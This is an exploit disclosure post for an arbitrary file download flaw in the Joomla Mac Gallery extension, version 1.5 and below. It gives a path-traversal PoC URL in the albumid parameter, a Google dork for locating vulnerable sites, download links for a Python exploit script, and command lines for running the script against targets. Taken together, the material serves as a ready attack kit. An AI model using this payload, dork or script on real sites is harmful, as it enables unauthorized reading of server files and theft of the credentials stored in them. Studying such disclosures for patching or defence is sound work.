Joomla Mac Gallery 1.5 and below Arbitrary File Download vulnerability

Joomla Mac Gallery

######################

# Exploit Title : Joomla Mac Gallery <= 1.5 Arbitrary File Download

# Exploit Author : Claudio Viviani

# Vendor Homepage : https://www.apptha.com

# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/18

# Dork Google: inurl:option=com_macgallery

# Date : 2014-09-17

# Tested on : Windows 7 / Mozilla Firefox

#             Linux / Mozilla Firefox

# Info:

# Joomla Mac Gallery suffers from Arbitrary File Download vulnerability

# PoC Exploit:

# http://localhost/index.php?option=com_macgallery&view=download&albumid=[../../filename]

# "album_id" variable is not sanitized.

######################

Discovered By : Claudio Viviani
                http://www.homelab.it
        
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

Download

Download: j00ml4_mac_gallery_15_afd.py 
          j00ml4_mac_gallery_15_afd.py (Mega Mirror)

Exploit Usage

python j00ml4_mac_gallery_15_afd.py -t http[s]://localhost[:PORT]
python j00ml4_mac_gallery_15_afd.py -t http[s]://localhost/basedir[:PORT]